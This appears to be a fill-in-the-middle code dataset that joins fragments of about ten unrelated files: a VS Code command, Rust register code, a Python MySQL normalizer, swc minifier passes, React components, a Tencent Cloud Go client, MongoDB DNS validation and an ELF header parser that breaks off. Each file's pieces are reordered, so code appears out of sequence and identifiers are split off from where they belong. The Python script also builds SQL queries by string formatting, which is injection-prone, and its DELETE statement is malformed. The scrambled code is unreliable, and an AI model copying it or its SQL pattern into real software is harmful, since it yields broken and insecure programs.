title: localize('search.action.focusQueryEditorWidget', "Focus Search Editor Input"),
category,
menu: {
id: MenuId.CommandPalette,
when: ActiveEditorContext.isEqualTo(SearchEditorConstants.SearchEditorID)
},
keybinding: {
primary: KeyCode.Escape,
when: SearchEditorConstants.InSearchEditor,
weight: KeybindingWeight.EditorContrib
}
});
}
async run(accessor: ServicesAccessor) {
const editorService = accessor.get(IEditorService);
const input = editorService.activeEditor;
if (input instanceof SearchEditorInput) {
(editorService.activeEditorPane as SearchEditor).focusSearchInput();
}
}
});
//#endregion | id: ToggleSearchEditorRegexCommandId, |
stim24.rs | #[doc = r" Value read from the register"]
pub struct R {
bits: u32,
}
#[doc = r" Value to write to the register"]
pub struct W {
bits: u32,
}
impl super::STIM24 {
#[doc = r" Modifies the contents of the register"]
#[inline]
pub fn modify<F>(&self, f: F)
where
for<'w> F: FnOnce(&R, &'w mut W) -> &'w mut W,
{
let bits = self.register.get();
let r = R { bits: bits };
let mut w = W { bits: bits };
f(&r, &mut w);
self.register.set(w.bits);
}
#[doc = r" Reads the contents of the register"]
#[inline]
pub fn read(&self) -> R {
R {
bits: self.register.get(),
}
}
#[doc = r" Writes to the register"]
#[inline]
pub fn write<F>(&self, f: F)
where
F: FnOnce(&mut W) -> &mut W,
{
let mut w = W::reset_value();
f(&mut w);
self.register.set(w.bits);
}
#[doc = r" Writes the reset value to the register"]
#[inline]
pub fn reset(&self) {
self.write(|w| w)
}
}
#[doc = r" Value of the field"]
pub struct | {
bits: u32,
}
impl STIM24R {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bits(&self) -> u32 {
self.bits
}
}
#[doc = r" Proxy"]
pub struct _STIM24W<'a> {
w: &'a mut W,
}
impl<'a> _STIM24W<'a> {
#[doc = r" Writes raw bits to the field"]
#[inline]
pub unsafe fn bits(self, value: u32) -> &'a mut W {
const MASK: u32 = 4294967295;
const OFFSET: u8 = 0;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
impl R {
#[doc = r" Value of the register as raw bits"]
#[inline]
pub fn bits(&self) -> u32 {
self.bits
}
#[doc = "Bits 0:31 - 31:0\\] A write to this location causes data to be written into the FIFO if TER.STIMENA24 is set. Reading from the stimulus port returns the FIFO status in bit \\[0\\]: 0 = full, 1 = not full. The polled FIFO interface does not provide an atomic read-modify-write, so it's users responsibility to ensure exclusive read-modify-write if this ITM port is used concurrently by interrupts or other threads."]
#[inline]
pub fn stim24(&self) -> STIM24R {
let bits = {
const MASK: u32 = 4294967295;
const OFFSET: u8 = 0;
((self.bits >> OFFSET) & MASK as u32) as u32
};
STIM24R { bits }
}
}
impl W {
#[doc = r" Reset value of the register"]
#[inline]
pub fn reset_value() -> W {
W { bits: 0 }
}
#[doc = r" Writes raw bits to the register"]
#[inline]
pub unsafe fn bits(&mut self, bits: u32) -> &mut Self {
self.bits = bits;
self
}
#[doc = "Bits 0:31 - 31:0\\] A write to this location causes data to be written into the FIFO if TER.STIMENA24 is set. Reading from the stimulus port returns the FIFO status in bit \\[0\\]: 0 = full, 1 = not full. The polled FIFO interface does not provide an atomic read-modify-write, so it's users responsibility to ensure exclusive read-modify-write if this ITM port is used concurrently by interrupts or other threads."]
#[inline]
pub fn stim24(&mut self) -> _STIM24W {
_STIM24W { w: self }
}
}
| STIM24R |
normalizer_mysql.py | #!/usr/bin/python3
import json,datetime,time,argparse,logging,sys,os
sys.path.append(os.path.join(os.path.dirname(__file__), "libs"))
from boto3.dynamodb.conditions import Attr
import general_storage,sqs,utils,query,general_storage_mysql
from progress.bar import Bar
from pprint import pprint
class Normalizer():
## Normalizer class hold data and configurations for normalizing source/target pairs
## source(input) of normalization
source={}
## target(output) of normalization
target={}
## mapping from target key to source key or lambda function
target_source_rule={}
def set_source(self,source):
self.source=source
def set_target(self,target):
self.target=target
def get_source_value(self,s):
## get value from source with key s or lambda function s
mapping=self.target_source_rule[s]
if isinstance(mapping,str):
## if mapping is a string key
return self.source.get(mapping)
else:
## if mapping is lambda function
return mapping(self)
def get_info(self,item):
## get info field
author = self.get_author(item)
return utils.fix_data_to_string({
"created_time" : item["created_time"],
"message":item['message'],
"from" : author
}) | return utils.fix_data_to_string({"id":item["user_id"],
"name":item.get("user_name","unknown"),
"profile_picture_url":item['original_data'].get("user",{}).get("profile_image_url_https","")})
def normalize_source_to_target(self,cf,source):
## Normalizing from source obect to target object
self.set_source(source)
if self.source:
for s in self.target_source_rule:
self.target[s] = self.get_source_value(s)
else:
print("No source specified")
class Normalizer_post_dynomodb_mysql(Normalizer):
## Normalizer class for post from dynamodb to mysql
name="posts"
## source(input) of normalization
source={}
## target(output) of normalization
target={}
target_source_rule={'page_id':'asset_id',
'sub_page_id':'asset_id',
'post_id':'object_id',
'updated_time':'updated_time',
'created_time':'created_time',
'info':lambda x: x.get_info(x.source),
'json_search':'',
'author':lambda x:x.get_author(x.source),
'tags':'',
'task_ids':''
}
class Normalizer_comment_dynomodb_mysql(Normalizer):
## Normalizer class for comment from dynamodb to mysql
name="comments"
## source(input) of normalization
source={}
## target(output) of normalization
target={}
target_source_rule={'page_id':'asset_id',
'sub_page_id':'asset_id',
'message':'message',
'post_id':'post_id',
'comment_id':'object_id',
#'parent_id':'post_id',
#'updated_time':'updated_time',
'created_time':'created_time',
'info':lambda x: x.get_info(x.source),
'json_search':'',
'author':lambda x:x.get_author(x.source),
'tags':'',
'task_ids':''
}
def insert_dynamodb_item_into_mysql(cf,i):
## Main function to call normalizer to normalize object from dynamodb object to mysql object, and then insert normalized item to mysql database
if i['object_type']=='post':
nl = Normalizer_post_dynomodb_mysql()
else:
nl = Normalizer_comment_dynomodb_mysql()
nl.normalize_source_to_target(cf,i)
connection = general_storage_mysql.create_connection(cf)
attributes,values = general_storage_mysql.simple_json_to_mysql_query(nl.target)
query="insert into twit_%s_%s(%s) values(%s)" %(nl.name,cf.client_short_name,attributes,values)
print(query)
general_storage_mysql.execute_query(connection,query)
def delete_mysql_item(cf,i):
## Main function to call deleteitem to mysql database
if i['object_type']=='post':
query="delete from twit_posts_%s(%s) where post_id=%s" %(cf.client_short_name,i['object_id'])
else:
query="delete from twit_comments_%s(%s) where comment_id=%s" %(cf.client_short_name,i['object_id'])
connection = general_storage_mysql.create_connection(cf)
general_storage_mysql.execute_query(connection,query)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Normalizer for twitter between DynamoDB and mysql')
parser.add_argument('config', type=str, help='an config file for normalizer')
parser.add_argument('--query', type=str, default=None, help='query to get data for normalizer')
parser.add_argument('--type', type=str, default="own", help='general or own. general:get everything using query; own:get own post and all replies')
args = parser.parse_args()
config = __import__(args.config)
cf =config.Config()
if args.type=="own":
query_str = args.query
if query_str:
query_str = query_str + " AND user_id:%s AND object_type:post" %(cf.twitter_user_id)
else:
query_str="user_id:%s AND object_type:post" %(cf.twitter_user_id)
total,posts = query.query_items(cf,query_str)
if total>0:
for post_id in [x["id"] for x in posts]:
post_with_comments=general_storage.get_item_and_comments(cf,post_id)
#print("%s comments" %(len(post_with_comments["comments"])))
insert_dynamodb_item_into_mysql(cf,post_with_comments["item"])
for comment in post_with_comments["comments"]:
insert_dynamodb_item_into_mysql(cf,comment)
elif args.type=="general":
#utils.run_until_finish(lambda: utils.process_sqs_rerun(cf,queue_name,process_clara,cf.clara_batch_size))
db_items=general_storage.get_items_by_ids(cf,query.es_outputs_to_ids(items))
for i in db_items:
insert_dynamodb_item_into_mysql(cf,i) |
def get_author(self,item):
## get author field |
serializers.py | from rest_framework import serializers
from .models import Movies
class MoviesSerializer(serializers.ModelSerializer):
class | :
model = Movies
fields = [
'id' , 'user_main', 'title', 'director', 'acts', 'created_at'
] | Meta |
sequences.rs | use super::Pure;
use crate::mode::Mode;
use swc_common::{util::take::Take, SyntaxContext, DUMMY_SP};
use swc_ecma_ast::*;
use swc_ecma_utils::{ExprExt, ExprFactory};
impl<M> Pure<'_, M>
where
M: Mode,
{
pub(super) fn drop_useless_ident_ref_in_seq(&mut self, seq: &mut SeqExpr) {
if !self.options.collapse_vars {
return;
}
if seq.exprs.len() < 2 {
return;
}
match (
&*seq.exprs[seq.exprs.len() - 2],
&*seq.exprs[seq.exprs.len() - 1],
) {
(Expr::Assign(assign @ AssignExpr { op: op!("="), .. }), Expr::Ident(ident)) => {
// Check if lhs is same as `ident`.
match &assign.left {
PatOrExpr::Expr(_) => {}
PatOrExpr::Pat(left) => match &**left {
Pat::Ident(left) => {
if left.id.sym == ident.sym && left.id.span.ctxt == ident.span.ctxt {
tracing::debug!(
"drop_useless_ident_ref_in_seq: Dropping `{}` as it's useless",
left.id
);
self.changed = true;
seq.exprs.pop();
}
}
_ => {}
},
}
}
_ => {}
}
}
///
/// - `(a, b, c) && d` => `a, b, c && d`
pub(super) fn lift_seqs_of_bin(&mut self, e: &mut Expr) {
let bin = match e {
Expr::Bin(b) => b,
_ => return,
};
match &mut *bin.left {
Expr::Seq(left) => {
if left.exprs.is_empty() {
return;
}
self.changed = true;
tracing::debug!("sequences: Lifting sequence in a binary expression");
let left_last = left.exprs.pop().unwrap();
let mut exprs = left.exprs.take();
exprs.push(Box::new(Expr::Bin(BinExpr {
span: left.span,
op: bin.op,
left: left_last,
right: bin.right.take(),
})));
*e = Expr::Seq(SeqExpr {
span: bin.span,
exprs,
})
}
_ => {}
}
}
///
/// - `x = (foo(), bar(), baz()) ? 10 : 20` => `foo(), bar(), x = baz() ? 10 | }
let assign = match e {
Expr::Assign(v @ AssignExpr { op: op!("="), .. }) => v,
_ => return,
};
let cond = match &mut *assign.right {
Expr::Cond(v) => v,
_ => return,
};
match &mut *cond.test {
Expr::Seq(test) => {
//
if test.exprs.len() >= 2 {
let mut new_seq = vec![];
new_seq.extend(test.exprs.drain(..test.exprs.len() - 1));
self.changed = true;
tracing::debug!("sequences: Lifting sequences in a assignment with cond expr");
let new_cond = CondExpr {
span: cond.span,
test: test.exprs.pop().unwrap(),
cons: cond.cons.take(),
alt: cond.alt.take(),
};
new_seq.push(Box::new(Expr::Assign(AssignExpr {
span: assign.span,
op: assign.op,
left: assign.left.take(),
right: Box::new(Expr::Cond(new_cond)),
})));
*e = Expr::Seq(SeqExpr {
span: assign.span,
exprs: new_seq,
});
return;
}
}
_ => {}
}
}
/// `(a = foo, a.apply())` => `(a = foo).apply()`
///
/// This is useful for outputs of swc/babel
pub(super) fn merge_seq_call(&mut self, e: &mut SeqExpr) {
if !self.options.sequences() {
return;
}
for idx in 0..e.exprs.len() {
let (e1, e2) = e.exprs.split_at_mut(idx);
let a = match e1.last_mut() {
Some(v) => &mut **v,
None => continue,
};
let b = match e2.first_mut() {
Some(v) => &mut **v,
None => continue,
};
match (&mut *a, &mut *b) {
(
Expr::Assign(a_assign @ AssignExpr { op: op!("="), .. }),
Expr::Call(CallExpr {
callee: ExprOrSuper::Expr(b_callee),
args,
..
}),
) => {
let var_name = a_assign.left.as_ident();
let var_name = match var_name {
Some(v) => v,
None => continue,
};
match &mut **b_callee {
Expr::Member(MemberExpr {
obj: ExprOrSuper::Expr(b_callee_obj),
computed: false,
prop,
..
}) => {
//
if !b_callee_obj.is_ident_ref_to(var_name.sym.clone()) {
continue;
}
match &**prop {
Expr::Ident(Ident { sym, .. }) => match &**sym {
"apply" | "call" => {}
_ => continue,
},
_ => {}
}
let span = a_assign.span.with_ctxt(SyntaxContext::empty());
let obj = a.take();
let new = Expr::Call(CallExpr {
span,
callee: MemberExpr {
span: DUMMY_SP,
obj: obj.as_obj(),
prop: prop.take(),
computed: false,
}
.as_callee(),
args: args.take(),
type_args: Default::default(),
});
b.take();
self.changed = true;
tracing::debug!(
"sequences: Reducing `(a = foo, a.call())` to `((a = foo).call())`"
);
*a = new;
}
_ => {}
};
}
_ => {}
}
}
}
} | /// : 20;`
pub(super) fn lift_seqs_of_cond_assign(&mut self, e: &mut Expr) {
if !self.options.sequences() {
return; |
GiiApplication.js | import React from 'react';
import PropTypes from 'prop-types';
import {connect} from 'react-redux';
import {Router, Link, Nav} from 'yii-steroids/ui/nav';
import {Notifications} from 'yii-steroids/ui/layout';
import {push} from 'react-router-redux';
import _orderBy from 'lodash/orderBy';
import _values from 'lodash/values';
import {html, http, widget} from 'components';
import IndexPage from './routes/IndexPage';
import AccessPage from './routes/AccessPage/index';
import ClassCreatorPage from './routes/ClassCreatorPage/index';
import ClassTypeMeta from '../../enums/meta/ClassTypeMeta';
import './GiiApplication.scss';
const bem = html.bem('GiiApplication');
export default
@widget.register('\\steroids\\modules\\gii\\widgets\\GiiApplication\\GiiApplication')
@connect()
class | extends React.PureComponent {
static propTypes = {
roles: PropTypes.arrayOf(PropTypes.string),
siteName: PropTypes.string,
};
constructor() {
super(...arguments);
this._onEntityComplete = this._onEntityComplete.bind(this);
this.state = {
isLoading: false,
classes: null,
appTypes: null,
moduleIds: null,
sampleAttributes: [],
};
}
componentDidMount() {
this.fetchData();
}
render() {
return (
<div className={bem.block({loading: this.state.isLoading})}>
<nav className='navbar navbar-expand-md navbar-dark bg-dark mb-3'>
<div className='container'>
<div>
<Link
className='navbar-brand'
to='/'
>
Gii
</Link>
<Link
className='navbar-brand'
url={this.props.siteName}
>
На главную
</Link>
</div>
<Nav
layout='navbar'
items={[
{
label: 'Сущности',
to: '/',
},
{
label: 'Права доступа',
to: '/access/actions',
},
{
label: 'Карта сайта',
to: '/site-map',
},
]}
/>
</div>
</nav>
<div className={bem(bem.element('content'), 'container')}>
<Notifications/>
<Router
routes={[
{
exact: true,
path: '/',
component: IndexPage,
componentProps: {
moduleIds: this.state.moduleIds,
classes: this.state.classes,
},
},
{
path: '/access',
component: AccessPage,
},
{
path: '/:classType(' + ClassTypeMeta.getKeys().join('|') + ')/:moduleId?/:name?',
component: ClassCreatorPage,
componentProps: {
moduleIds: this.state.moduleIds,
classes: this.state.classes,
appTypes: this.state.appTypes,
sampleAttributes: this.state.sampleAttributes,
onEntityComplete: this._onEntityComplete,
},
},
]}
/>
</div>
</div>
);
}
_onEntityComplete() {
this.props.dispatch(push('/'));
this.fetchData();
}
_getSampleAttributes(classes) {
const sampleAttributes = {};
const defaultSamples = {
id: ['primaryKey', 'ID'],
title: ['string', 'Название'],
email: ['email', 'Email'],
phone: ['phone', 'Телефон'],
password: ['password', 'Пароль'],
photo: ['file', 'Фотография'],
photos: ['files', 'Фотографии'],
image: ['file', 'Изображение'],
images: ['files', 'Изображения'],
file: ['file', 'Файл'],
files: ['files', 'Файлы'],
passwordAgain: ['password', 'Повтор пароля'],
description: ['text', 'Описание'],
content: ['text', 'Контент'],
userId: ['integer', 'Пользователь'],
authorId: ['integer', 'Автор'],
isEnable: ['boolean', 'Включен?'],
isDeleted: ['boolean', 'Удален?'],
status: ['enum', 'Статус'],
createTime: ['autoTime', 'Добавлен'],
updateTime: ['autoTime', 'Обновлен', {touchOnUpdate: true}],
};
Object.keys(defaultSamples).forEach(id => {
sampleAttributes[id] = {
counter: 1,
params: {
appType: defaultSamples[id][0],
label: defaultSamples[id][1],
...defaultSamples[id][2],
}
};
});
[classes.model, classes.form].map(models => {
models.forEach(model => {
model.attributeItems.map(item => {
if (sampleAttributes[item.name]) {
sampleAttributes[item.name].counter++;
} else {
sampleAttributes[item.name] = {
counter: 1,
params: {
appType: item.appType,
defaultValue: item.defaultValue,
example: item.example,
hint: item.hint,
label: item.label,
},
};
}
});
});
});
Object.keys(sampleAttributes).forEach(id => {
sampleAttributes[id].id = id;
sampleAttributes[id].label = id;
});
return _orderBy(_values(sampleAttributes), 'counter', 'desc');
}
fetchData() {
this.setState({isLoading: true});
http.post('/api/gii/get-entities')
.then(data => this.setState({
...data,
sampleAttributes: this._getSampleAttributes(data.classes),
isLoading: false,
}));
}
}
| GiiApplication |
client.go | // Copyright 1999-2018 Tencent Ltd.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package v20180129
import (
"github.com/tencentcloud/tencentcloud-sdk-go/tencentcloud/common"
tchttp "github.com/tencentcloud/tencentcloud-sdk-go/tencentcloud/common/http"
"github.com/tencentcloud/tencentcloud-sdk-go/tencentcloud/common/profile"
)
const APIVersion = "2018-01-29"
type Client struct {
common.Client
}
func NewClientWithSecretId(secretId, secretKey, region string) (client *Client, err error) {
client = &Client{}
client.Init(region).WithSecretId(secretId, secretKey)
return
}
func NewClient(credential *common.Credential, region string, clientProfile *profile.ClientProfile) (client *Client, err error) {
client = &Client{}
client.Init(region).
WithSecretId(credential.SecretId, credential.SecretKey).
WithProfile(clientProfile)
return
}
func NewDescribeBrandCommentCountRequest() (request *DescribeBrandCommentCountRequest) {
request = &DescribeBrandCommentCountRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeBrandCommentCount")
return
}
func NewDescribeBrandCommentCountResponse() (response *DescribeBrandCommentCountResponse) {
response = &DescribeBrandCommentCountResponse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// 通过分析用户在评价品牌时用词的正负面情绪评分,返回品牌好评与差评评价条数,按天输出结果。
func (c *Client) DescribeBrandCommentCount(request *DescribeBrandCommentCountRequest) (response *DescribeBrandCommentCountResponse, err error) {
if request == nil {
request = NewDescribeBrandCommentCountRequest()
}
response = NewDescribeBrandCommentCountResponse()
err = c.Send(request, response)
return
}
func NewDescribeBrandExposureRequest() (request *DescribeBrandExposureRequest) {
request = &DescribeBrandExposureRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeBrandExposure")
return
}
func NewDescribeBrandExposureResponse() (response *DescribeBrandExposureResponse) {
response = &DescribeBrandExposureResponse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// 监测品牌关键词命中文章标题或全文的文章篇数,按天输出数据。
func (c *Client) DescribeBrandExposure(request *DescribeBrandExposureRequest) (response *DescribeBrandExposureResponse, err error) {
if request == nil {
request = NewDescribeBrandExposureRequest()
}
response = NewDescribeBrandExposureResponse()
err = c.Send(request, response)
return
}
func NewDescribeBrandMediaReportRequest() (request *DescribeBrandMediaReportRequest) {
request = &DescribeBrandMediaReportRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeBrandMediaReport")
return
}
func NewDescribeBrandMediaReportResponse() (response *DescribeBrandMediaReportResponse) {
response = &DescribeBrandMediaReportResponse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// 监测品牌关键词出现在媒体网站(新闻媒体、网络门户、政府网站、微信公众号、天天快报等)发布资讯标题和正文中的报道数。按天输出结果。
func (c *Client) DescribeBrandMediaReport(request *DescribeBrandMediaReportRequest) (response *DescribeBrandMediaReportResponse, err error) {
if request == nil {
request = NewDescribeBrandMediaReportRequest()
}
response = NewDescribeBrandMediaReportResponse()
err = c.Send(request, response)
return
}
func NewDescribeBrandNegCommentsRequest() (request *DescribeBrandNegCommentsRequest) {
request = &DescribeBrandNegCommentsRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeBrandNegComments")
return
}
func NewDescribeBrandNegCommentsResponse() (response *DescribeBrandNegCommentsResponse) {
response = &DescribeBrandNegCommentsResponse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// 通过分析用户在评价品牌时用词的正负面情绪评分,返回品牌热门差评观点列表。
func (c *Client) DescribeBrandNegComments(request *DescribeBrandNegCommentsRequest) (response *DescribeBrandNegCommentsResponse, err error) {
if request == nil {
request = NewDescribeBrandNegCommentsRequest()
}
response = NewDescribeBrandNegCommentsResponse()
err = c.Send(request, response)
return
}
func NewDescribeBrandPosCommentsRequest() (request *DescribeBrandPosCommentsRequest) {
request = &DescribeBrandPosCommentsRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeBrandPosComments")
return
}
func NewDescribeBrandPosCommentsResponse() (response *DescribeBrandPosCommentsResponse) {
response = &DescribeBrandPosCommentsResponse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// 通过分析用户在评价品牌时用词的正负面情绪评分,返回品牌热门好评观点列表。
func (c *Client) DescribeBrandPosComments(request *DescribeBrandPosCommentsRequest) (response *DescribeBrandPosCommentsResponse, err error) {
if request == nil {
request = NewDescribeBrandPosCommentsRequest()
}
response = NewDescribeBrandPosCommentsResponse()
err = c.Send(request, response)
return
}
func NewDescribeBrandSocialOpinionRequest() (request *DescribeBrandSocialOpinionRequest) {
request = &DescribeBrandSocialOpinionRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeBrandSocialOpinion")
return
}
func NewDescribeBrandSocialOpinionResponse() (response *DescribeBrandSocialOpinionResponse) {
response = &DescribeBrandSocialOpinionResponse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// 检测品牌关键词出现在微博、QQ兴趣部落、论坛、博客等个人公开贡献资讯中的内容,每天聚合近30天热度最高的观点列表。
func (c *Client) DescribeBrandSocialOpinion(request *DescribeBrandSocialOpinionRequest) (response *DescribeBrandSocialOpinionResponse, err error) {
if request == nil {
request = NewDescribeBrandSocialOpinionRequest()
}
response = NewDescribeBrandSocialOpinionResponse()
err = c.Send(request, response)
return
}
func NewDescribeBrandSocialReportRequest() (request *DescribeBrandSocialReportRequest) {
request = &DescribeBrandSocialReportRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeBrandSocialReport")
return
}
func NewDescribeBrandSocialReportResponse() (response *DescribeBrandSocia | onse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// 监测品牌关键词出现在微博、QQ兴趣部落、论坛、博客等个人公开贡献资讯中的条数。按天输出数据结果。
func (c *Client) DescribeBrandSocialReport(request *DescribeBrandSocialReportRequest) (response *DescribeBrandSocialReportResponse, err error) {
if request == nil {
request = NewDescribeBrandSocialReportRequest()
}
response = NewDescribeBrandSocialReportResponse()
err = c.Send(request, response)
return
}
func NewDescribeIndustryNewsRequest() (request *DescribeIndustryNewsRequest) {
request = &DescribeIndustryNewsRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeIndustryNews")
return
}
func NewDescribeIndustryNewsResponse() (response *DescribeIndustryNewsResponse) {
response = &DescribeIndustryNewsResponse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// 根据客户定制的行业关键词,监测关键词出现在媒体网站(新闻媒体、网络门户、政府网站、微信公众号、天天快报等)发布资讯标题和正文中的报道数,以及文章列表、来源渠道、作者、发布时间等。
func (c *Client) DescribeIndustryNews(request *DescribeIndustryNewsRequest) (response *DescribeIndustryNewsResponse, err error) {
if request == nil {
request = NewDescribeIndustryNewsRequest()
}
response = NewDescribeIndustryNewsResponse()
err = c.Send(request, response)
return
}
func NewDescribeUserPortraitRequest() (request *DescribeUserPortraitRequest) {
request = &DescribeUserPortraitRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeUserPortrait")
return
}
func NewDescribeUserPortraitResponse() (response *DescribeUserPortraitResponse) {
response = &DescribeUserPortraitResponse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// 通过分析洞察参与过品牌媒体互动的用户,比如公开发表品牌的新闻评论、在公开社交渠道发表过对品牌的评价观点等用户,返回用户的画像属性分布,例如性别、年龄、地域、喜爱的明星、喜爱的影视。
func (c *Client) DescribeUserPortrait(request *DescribeUserPortraitRequest) (response *DescribeUserPortraitResponse, err error) {
if request == nil {
request = NewDescribeUserPortraitRequest()
}
response = NewDescribeUserPortraitResponse()
err = c.Send(request, response)
return
}
| lReportResponse) {
response = &DescribeBrandSocialReportResp |
dns.go | // Copyright (C) MongoDB, Inc. 2017-present.
//
// Licensed under the Apache License, Version 2.0 (the "License"); you may
// not use this file except in compliance with the License. You may obtain
// a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
package dns
import (
"errors"
"fmt"
"net"
"runtime"
"strings"
)
// Resolver resolves DNS records.
type Resolver struct {
// Holds the functions to use for DNS lookups
LookupSRV func(string, string, string) (string, []*net.SRV, error)
LookupTXT func(string) ([]string, error)
}
// DefaultResolver is a Resolver that uses the default Resolver from the net package.
var DefaultResolver = &Resolver{net.LookupSRV, net.LookupTXT}
// ParseHosts uses the srv string to get the hosts.
func (r *Resolver) ParseHosts(host string, stopOnErr bool) ([]string, error) {
parsedHosts := strings.Split(host, ",")
if len(parsedHosts) != 1 {
return nil, fmt.Errorf("URI with SRV must include one and only one hostname")
}
return r.fetchSeedlistFromSRV(parsedHosts[0], stopOnErr)
}
// GetConnectionArgsFromTXT gets the TXT record associated with the host and returns the connection arguments.
func (r *Resolver) GetConnectionArgsFromTXT(host string) ([]string, error) {
var connectionArgsFromTXT []string
// error ignored because not finding a TXT record should not be
// considered an error.
recordsFromTXT, _ := r.LookupTXT(host)
// This is a temporary fix to get around bug https://github.com/golang/go/issues/21472.
// It will currently incorrectly concatenate multiple TXT records to one
// on windows.
if runtime.GOOS == "windows" {
recordsFromTXT = []string{strings.Join(recordsFromTXT, "")}
}
if len(recordsFromTXT) > 1 {
return nil, errors.New("multiple records from TXT not supported")
}
if len(recordsFromTXT) > 0 {
connectionArgsFromTXT = strings.FieldsFunc(recordsFromTXT[0], func(r rune) bool { return r == ';' || r == '&' })
err := validateTXTResult(connectionArgsFromTXT)
if err != nil {
return nil, err
}
}
return connectionArgsFromTXT, nil
}
func (r *Resolver) fetchSeedlistFromSRV(host string, stopOnErr bool) ([]string, error) {
var err error
_, _, err = net.SplitHostPort(host)
if err == nil {
// we were able to successfully extract a port from the host,
// but should not be able to when using SRV
return nil, fmt.Errorf("URI with srv must not include a port number")
}
_, addresses, err := r.LookupSRV("mongodb", "tcp", host)
if err != nil {
return nil, err
}
trimmedHost := strings.TrimSuffix(host, ".")
var parsedHosts []string
for _, address := range addresses {
trimmedAddressTarget := strings.TrimSuffix(address.Target, ".")
err := validateSRVResult(trimmedAddressTarget, trimmedHost)
if err != nil {
if stopOnErr {
return nil, err
}
continue
}
parsedHosts = append(parsedHosts, fmt.Sprintf("%s:%d", trimmedAddressTarget, address.Port))
}
return parsedHosts, nil
}
func validateSRVResult(recordFromSRV, inputHostName string) error {
separatedInputDomain := strings.Split(inputHostName, ".")
separatedRecord := strings.Split(recordFromSRV, ".")
if len(separatedRecord) < 2 {
return errors.New("DNS name must contain at least 2 labels")
}
if len(separatedRecord) < len(separatedInputDomain) {
return errors.New("Domain suffix from SRV record not matched input domain")
}
inputDomainSuffix := separatedInputDomain[1:]
domainSuffixOffset := len(separatedRecord) - (len(separatedInputDomain) - 1)
recordDomainSuffix := separatedRecord[domainSuffixOffset:]
for ix, label := range inputDomainSuffix {
if label != recordDomainSuffix[ix] {
return errors.New("Domain suffix from SRV record not matched input domain")
}
}
return nil
}
var allowedTXTOptions = map[string]struct{}{
"authsource": {},
"replicaset": {},
"loadbalanced": {},
}
func | (paramsFromTXT []string) error {
for _, param := range paramsFromTXT {
kv := strings.SplitN(param, "=", 2)
if len(kv) != 2 {
return errors.New("Invalid TXT record")
}
key := strings.ToLower(kv[0])
if _, ok := allowedTXTOptions[key]; !ok {
return fmt.Errorf("Cannot specify option '%s' in TXT record", kv[0])
}
}
return nil
}
| validateTXTResult |
RemainingPlayers.tsx | import React from 'react'
import { useNetTableValues } from 'react-panorama';
import Styles from './styles.module.css';
const avatar: Partial<VCSSStyleDeclaration> = {
width: '20px',
height: '20px',
border: '1px solid rgba(0, 0, 0, 0.5)',
borderRadius: '5px',
verticalAlign: 'center',
horizontalAlign: 'left',
marginLeft: '5px',
marginRight: '5px',
}
const RemainingPlayers = () => {
const heroes = useNetTableValues('HeroSelectionHeroes').heroes;
const allPlayerIDs: PlayerID[] = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20];
const unpickedPlayerIDs = allPlayerIDs
.filter(id => !Object.values(heroes).some(hero => hero.playerID === id))
.filter(id => Players.IsValidPlayerID(id));
if (unpickedPlayerIDs.length === 0) {
return null;
}
return (
<Panel className={Styles.container}>
<Label className={Styles.label} text={'Players Remaining'} /> | <DOTAAvatarImage
key={id}
steamid={Game.GetPlayerInfo(id).player_steamid}
style={avatar}
/>
))}
</Panel>
</Panel>
);
}
export default RemainingPlayers; | <Panel className={Styles.imagesContainer} >
{unpickedPlayerIDs.map(id => ( |
file_header.rs | use crate::inter::*;
#[derive(Clone, Debug)]
pub struct FileHeader {
elf_ident:ElfIdent,
e_type:u16,
e_machine:u16,
e_version:u32,
e_entry:u32,
e_phoff:u32,
e_shoff:u32,
e_flags:u32,
e_ehsize:u16,
e_phentsize:u16,
e_phnum:u16,
e_shentsize:u16,
e_shnum:u16,
e_shstrndx:u16,
}
impl FileHeader{
pub fn new(file:&[u8])->FileHeader{
FileHeader{
elf_ident: ElfIdent::new(&file[0..9]),
e_type: u8_to_u16(&file[0x10..0x12]),
e_machine: u8_to_u16(&file[0x12..0x14]),
e_version: u8_to_u32(&file[0x14..0x18]),
e_entry: u8_to_u32(&file[0x18..0x1C]),
e_phoff: u8_to_u32(&file[0x1C..0x20]),
e_shoff:u8_to_u32(&file[0x20..0x24]),
e_flags:u8_to_u32(&file[0x24..0x28]),
e_ehsize:u8_to_u16(&file[0x28..0x2A]),
